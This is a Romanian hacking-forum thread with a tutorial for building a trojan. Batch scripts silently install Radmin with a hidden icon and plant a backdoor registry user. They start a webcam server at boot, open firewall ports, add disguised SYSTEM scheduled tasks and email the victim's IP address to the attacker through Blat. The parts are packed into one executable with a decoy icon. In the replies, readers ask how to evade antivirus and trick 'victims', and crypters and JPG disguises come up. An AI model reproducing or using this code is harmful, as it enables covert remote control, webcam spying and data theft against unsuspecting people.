Remote Control (Radmin 3 + IP pe mail+ RemCam)

[SenatoR_v]

In tutorialul urmator am sa va arat cum facem un tojan cu care sa avem remote desktop,cmd,remote file(radmin) sa avem acces si la web camera + ip-ul victimei sa ne vina pe mail

Downloadam Radmin 3

Îl face instal cu un cadru lini?tit ?i ad?ugam unu utilizator nou prin intermediul registrului

Pentru aceasta trebuie s? facem un fisier .bat

radmin_install.bat

@echo off

::Deschide instal radmin linistit fara a face restart

start msiexec.exe /i "radmin.msi" /quiet /norestart

::Prin aceasta ascundem iconul

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f

::Verificam daca nu a mai fost instalat radmin cu un alt user

For /F "tokens=1" %%a in ('reg query "HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1"') do set regpath=%%a

If DEFINED regpath (goto make_user2) Else (goto add_user)

::Daca a fost, cream un user nou

:make_user2

echo Windows Registry Editor Version 5.00 > log_pass.reg

echo. >> log_pass.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\10] >> log_pass.reg

copy /b log_pass.reg + user.txt

reg import log_pass.reg && del log_pass.reg

exit

::Daca nu a fost il facem noi pe primul

:add_user

echo Windows Registry Editor Version 5.00 > log_pass.reg

echo. >> log_pass.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1] >> log_pass.reg

copy /b log_pass.reg + user.txt

reg import log_pass.reg && del log_pass.reg

exit

Aceasta creeaz? un fi?ier de registru pentru utilizator

Este necesar s? se fac? un fi?ier text cu numele de utilizator ?i parola

user.txt

"1"=hex:10,00,00,08,75,00,73,00,65,00,72,00,30,00,01,00,98,47,fc,7e,0f,89,1d,\

fd,5d,02,f1,9d,58,7d,8f,77,ae,c0,b9,80,d4,30,4b,01,13,b4,06,f2,3e,2c,ec,58,\

ca,fc,a0,4a,53,e3,6f,b6,8e,0c,3b,ff,92,cf,33,57,86,b0,db,e6,0d,fe,41,78,ef,\

2f,cd,2a,4d,d0,99,47,ff,d8,df,96,fd,0f,9e,29,81,a3,2d,a9,55,03,34,2e,ca,9f,\

08,06,2c,bd,d4,ac,2d,7c,df,81,0d,b4,db,96,db,70,10,22,66,26,1c,d3,f8,bd,d5,\

6a,10,2f,c6,ce,ed,bb,a5,ea,e9,9e,61,27,bd,d9,52,f7,a0,d1,8a,79,02,1c,88,1a,\

e6,3e,c4,b3,59,03,87,f5,48,59,8f,2c,b8,f9,0d,ea,36,fc,4f,80,c5,47,3f,db,6b,\

0c,6b,db,0f,db,af,46,01,f5,60,dd,14,91,67,ea,12,5d,b8,ad,34,fd,0f,d4,53,50,\

de,c7,2c,fb,3b,52,8b,a2,33,2d,60,91,ac,ea,89,df,d0,6c,9c,4d,18,f6,97,24,5b,\

d2,ac,92,78,b9,2b,fe,7d,ba,fa,a0,c4,3b,40,a7,1f,19,30,eb,c4,fd,24,c9,e5,a2,\

e5,a4,cc,f5,d7,f5,15,44,d7,0b,2b,ca,4a,f5,b8,d3,7b,37,9f,d7,74,0a,68,2f,40,\

00,00,01,05,50,00,00,20,70,8d,ff,a4,d4,0d,97,d4,4f,61,1d,07,fa,48,2d,cc,f7,\

9f,a6,89,b5,12,3c,08,f9,cf,9c,9e,7b,56,aa,d8,60,00,01,00,5c,c7,67,0b,48,c1,\

01,cd,b6,91,ff,aa,d1,11,a8,ab,9b,e5,97,07,44,05,ef,44,4b,96,a1,ac,d0,5e,13,\

88,cf,87,76,dc,e0,31,73,cf,35,3d,ef,e6,ba,9c,90,5d,e7,2b,7c,61,35,f6,87,0b,\

f0,8d,9f,a2,78,21,27,e2,0c,8c,1b,76,59,25,78,5b,9c,18,26,db,47,5f,13,b7,40,\

bd,3d,17,49,34,f5,c4,60,81,f7,0c,7c,c5,2a,c6,57,a6,52,8d,ed,75,71,c1,26,d4,\

a2,79,e6,f9,18,13,f1,e6,55,ba,06,6c,ba,b5,4c,7a,1f,e4,96,16,5a,4b,1b,42,91,\

dd,8b,c1,aa,45,b8,15,8b,2d,be,c2,08,8a,24,5f,97,1b,7c,9f,8c,8e,5c,83,ee,83,\

ac,f3,3b,c8,36,aa,f4,12,0f,8e,43,05,e5,a6,23,80,14,1c,dd,df,cf,2b,c5,3c,ef,\

c4,84,60,87,f2,82,a1,e0,b9,53,d2,af,e6,1c,30,91,46,55,b9,18,de,54,42,86,3f,\

18,4e,cc,8d,6e,35,e9,9c,b2,04,21,c5,75,4d,17,eb,f8,78,b2,f9,11,4a,23,2c,97,\

49,64,14,01,76,63,1a,5e,50,e2,bc,91,9f,4b,c0,b1,95,0d,4e,49,46,04,c4,9d,71,\

20,00,00,04,ff,01,00,00

La sfirsit neaparat trebue sa fie 2 lini goale.

Asa arata login si parola utilizatorului hexat.

Aici sunt urmatoarele date:

Login: user

Parola: radminuser

Deasemena puteti sa adaugati un utilizator cu ce date doriti

Pentru asta, instalati radmin 3 si creativa un user cu parola..

Dupa care exportati fisierul: HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Par ameters\Radmin Security\1

Va fi aceiasi ca user.txt numai ca cu datele utilizatorului creat de voi:)

Acum noi avem:

1) radmin.msi

2) radmin_install.bat

3) user.txt

Este de dorit sa le lipim pe toate impreuna cu ajutorul programului: bat_to_exe converter

Configuram similar ca in imagine

Ne ducem la include urcam celelalte 2 fisiere(radmin.msi ? user.txt)

Facem clic pe Compile

Cu Radminulo am terminat!

Ip pe mail

Daca victima noastra are internet 3G la fiecare conectare la internet este posibil sa i se schimbe ip-ul asa ca va propun sa folositi optiunea "Ping" care la fiecare conectare raporteaza pe mail daca victima are alt ip.

Incepem cu WinVer(Joaca un rol important)

WinVer.bat

@echo off

:: Vedem ce fel de windows e instalat

for /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName ^| find "ProductName"') do set ProductName=%%b

if "%ProductName%" == "Microsoft Windows 2000" (goto IP)

if "%ProductName%" == "Microsoft Windows XP" (goto IP)

if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)

if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)

if "%ProductName%" == "Windows Vista Business" (goto IPv4)

if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)

if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)

if "%ProductName%" == "Windows Vista Starter" (goto IPv4)

if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)

if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)

if "%ProductName%" == "Windows Vista Business" (goto IPv4)

if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)

if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)

if "%ProductName%" == "Windows Vista Starter" (goto IPv4)

if "%ProductName%" == "Windows 7 Ultimate" (goto IPv4)

if "%ProductName%" == "Windows 7 Enterprise" (goto IPv4)

if "%ProductName%" == "Windows 7 Professional" (goto IPv4)

if "%ProductName%" == "Windows 7 Home Premium" (goto IPv4)

if "%ProductName%" == "Windows 7 Home Basic" (goto IPv4)

if "%ProductName%" == "Windows 7 Starter" (goto IPv4)

if "%ProductName%" == "%ProductName%" (goto IP)

:: Dac e ?? sau 2000 Vom folosi IP

:IP

echo start /d sysfiles\ send_IP.exe >> ..\ping.bat

echo exit >> ..\ping.bat

schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat

schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IP.exe"

del send_IPv4.exe

exit

:: Daca e ?? sau 2000 vom folosi IPv4

:IPv4

echo start /d sysfiles\ send_IPv4.exe >> ..\ping.bat

echo exit >> ..\ping.bat

schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat /f

schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IPv4.exe" /f

del send_IP.exe

exit

Daca veti folosi "Ping", atunci stergeti textul marcat cu rosu

Daca nu veti folosi "Ping",atunci stergeti textul marcat cu albastru

Insusi Pingul pentru verificarea ip-ului.

Ping.bat

@echo off
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)

:end
exit

:send

La sfirsit neaparat trebue sa fie un rind gol.

Mergem mai departe.

Neaparat ferificam schimbarea si trimiterea ip-ului pe mail.

Send_IP.bat

@echo off

set mail=blat.exe send.txt -to mailul_vostru@gmail.com

if not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt) else (goto test1)

:test1

if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IP" ip2.txt >> 2.txt)

del ip3.txt 3.txt

fc 1.txt 2.txt

IF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)

exit

:test2

if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IP" ip3.txt >> 3.txt)

del ip1.txt 1.txt

fc 2.txt 3.txt

IF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)

exit

:test3

if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt)

del ip2.txt 2.txt

fc 3.txt 1.txt

IF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)

exit

Send_IPv4.bat

@echo off

set mail=blat.exe send.txt -to mailul_vostru@gmail.com

if not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt) else (goto test1)

:test1

if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IPv4" ip2.txt >> 2.txt)

del ip3.txt 3.txt

fc 1.txt 2.txt

IF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)

exit

:test2

if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IPv4" ip3.txt >> 3.txt)

del ip1.txt 1.txt

fc 2.txt 3.txt

IF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)

exit

:test3

if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt)

del ip2.txt 2.txt

fc 3.txt 1.txt

IF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)

exit

Deci avem urmatoarele fisiere.

WinVer.bat

Send_IP.bat

Send_IPv4.bat

Deasemenea le lipim cu ajutorul programului Bat To Exe Converter cu urmatoarele configuratii.

Ping.bat il lasam asa cum este

Raportul il va trimite programul Blat

Si cu asta terminam.

Acum a ramas cea mai interesanta parte sa creem chiar instalul.

Principalu este sa nu te incurci

Install.bat

@ECHO OFF

:: Este necesara pentra ca consola sa inteleaga caracterele rusesti si sa ascunda dosarul Radmin din meniu start.

reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v CodePage /t REG_DWORD /d 1251 /f

reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FaceName /t REG_SZ /d "Lucida Console" /f

reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontFamily /t REG_DWORD /d 0x0000036 /f

reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontSize /t REG_DWORD /d 0x000c0000 /f

reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontWeight /t REG_DWORD /d 0x00002bc /f

::Deschidem radminul nostru pregatit

start radmin_install.exe

::Creem foldere pentru pastrarea fisierelor

mkdir %systemroot%\system32\sysfiles

mkdir %SystemRoot%\system32\sysfiles\server

::Extragem fi?ierele ?i copiam în directorul necesare

copy /y "blat.exe" "%SystemRoot%\system32\sysfiles\blat.exe"

copy /y "blat.lib" "%SystemRoot%\system32\sysfiles\blat.lib"

copy /y "blat.dll" "%SystemRoot%\system32\sysfiles\blat.dll"

copy /y "send_IP.exe" "%SystemRoot%\system32\sysfiles\send_IP.exe"

copy /y "send_IPv4.exe" "%SystemRoot%\system32\sysfiles\send_IPv4.exe"

copy /y "winver.exe" "%SystemRoot%\system32\sysfiles\winver.exe"

copy /y "ping.bat" "%SystemRoot%\system32\ping.bat"

copy /y "cam_server.exe" "%SystemRoot%\system32\sysfiles\server\cam_server.exe"

::Adaugam exceptie FireWall-ui

netsh firewall add allowedprogram "%SystemRoot%\system32\sysfiles\server\cam_server.exe" "cam_server" ENABLE

netsh firewall add portopening tcp 57011 all

::Facem configurarea Blat pentri trimiterea pe mail

"%SystemRoot%\system32\sysfiles\blat.exe" -install -server smtp.gmail.com -port 587 -f mailul@gmail.com -u Login -pw Parola

::Il deschidem odata cu Windowsu-ul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\system32\sysfiles\server\cam_server.exe pass=Parola port=57011" /f

::Prima trimitere de IP indata dupa rulare

ipconfig /all > %SystemRoot%\system32\sysfiles\ip1.txt & Echo %COMPUTERNAME% > %SystemRoot%\system32\sysfiles\1.txt & findstr "IP" %SystemRoot%\system32\sysfiles\ip1.txt >> %SystemRoot%\system32\sysfiles\1.txt

"%SystemRoot%\system32\sysfiles\blat.exe" "%SystemRoot%\system32\sysfiles\1.txt" -to mailul vostru@gmail.com

::Deschide WinVer care ne arata ce mod de trimitere a IP-ului se va utiliza

cd %SystemRoot%\system32\sysfiles\

start winver.exe

::Deschidem serverul Web camerei

cd %SystemRoot%\system32\sysfiles\server

start cam_server.exe pass=PAROLA port=57011

::Stergem ce e de prisos

rmdir /s /q "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Radmin Server 3"

rmdir /s /q "c:\Documents and Settings\%username%\??????? ????\?????????\Radmin Server 3"

del /q "%SystemRoot%\system32\sysfiles\winver.exe"

exit

Daca nu folositi RemCam doar stergeti rindurile unde se intilneste.

DownloadamRemCam(In arhiva este si server si client)

Aproape tot

Din nou ne lipim organele cu ajutorul Bat To Exe Converter

Respectind configuratile din imagine

Mergem in fila include si din nou adaugam urmatoarele fisiere:

ping.bat (Daca il veti folosi)

send_IP.exe

send_IPv4.exe

WinVer.exe

radmin_install.exe

cam_server.exe (Daca il veti folosi)

blat.exe

blat.dll

blat.lib

Download all bat files

blat

Apoi mergem in fila Versioninformations si bagam un icon si ne bucuram de Trojan

Credite:

SenatoR

Edited March 1, 2011 by SenatoR_v

[drakeRizz]

direct copy paste si ceva translate de la rusi, mai bine nu mai dateai credite,si pana la urma de ce ai face toate astea cand poti instala un RAT ?

[SenatoR_v]

1.Un asemenea tutorial este pe xakepok si acela e scris de varul meu + ca era altfel, acest tutorial deodata a fost creat pentru forumul rus xakepok de catre mine si nu cred ca imi ia cineva creditele!

2.MAI INVETI CEVA CITIND TOT DIN EL NU STAI SI TE UITI CUM SPY NET SU ETC.. ISI FAC TREABA DAR TU NICI NAI IDEIE CE AU FACUT!

[un_stra1n]

cum putem face trojanul nedetectabil? de avira ma intereseaza?? si ce fisier trebuie sa trimit la victima?

si care e faza cu RAT? e mai simplu?

[SenatoR_v]

plm rat-ul e ce formezi la urma!

Si nedetectabil de avira il faci daca ii schimbi iconul!

Edited February 19, 2011 by SenatoR_v

[drakeRizz]

e clar...senator te cheama. bafta cu soarecii tai , sau ce sunt astia.

[nicusor.ilie]

1) Multumesc pentru tutorial.

2) Si cum se schimba icon-ul (ca sa fie nedectabil)?

3) Toate arhivele sunt corupte! Eu nu le pot deschide (cu winrar). Rog pe proprietar sua cine le are sa le reposteze. Multumesc

4) Cum se procedeaza daca victima are si un Zona Alarnm instalat? Si un rpouter wireless?

5) Se poate pune in loc de radmin, orice program (de rempote control) (gen VNC)?

Multumesc

[fabio_livese]

ma poate ajuta cineva cu niste remote`uri?contracost bineinteles

[vaio]

Eu sunt mai batut in cap de fel. Imi poti explica mai ca la prosti ce trimit "victimei" si ce folosesc eu ? Stiu ca radmin o sa folosesc dar inafara de el, eu mai trebuie sa instalez vreun .bat ceva ? Multumesc !

[Laurix]

Citeste cu atentie si ai sa vezi ce trebuie sa faci .

[MagicThunder]

Sunteti chiar inapti ca sa zic asa.Tutorialul e facut mura in gura explicat "ca la prosti" iti da toate detaliile+ toate fisierele de care ai nevoi.Daca ai imaginatie poti aplica tutorialul asta si la alte RAT-uri.Pentru a nu fi detectat de antivirus e recomandabil sa aveti un Crypter bun + sa nu il scanati cu antivirusul pentru a fi luat in baza de date.

@un_stra1n la victima ii trimiti serverul si un_senator:)) "Si nedetectabil de avira il faci daca ii schimbi iconul!" aici m-ai dat pe spate:))pai daca i-ai schimba doar iconul la ce mai trebuie criptat?

Cum ziceam:puteti sa adaptati tutorialul si la alte rat-uri.Sky is the limit!

[andrew-46]

Nu ca as fi eu mare expert dar am facut ce ai explicat tu mai sus fara prea mari complicatii, cu bat to exe converter, o poza, un server de radmin, un .vbs, si un .bat... Pentru ip-ul pe mail am folosit site-ul How to find someones IP address si ce face .vbs-ul e sa deschida adresa aia pe care am primit-o in IE (fereastra invizibila)... Oricum in final am ramas doar cu un executabil, cu icoana de JPG care chiar deschide o poza cand este executat...

[proxyy]

la prima parte care e fisieru radmin.msi ?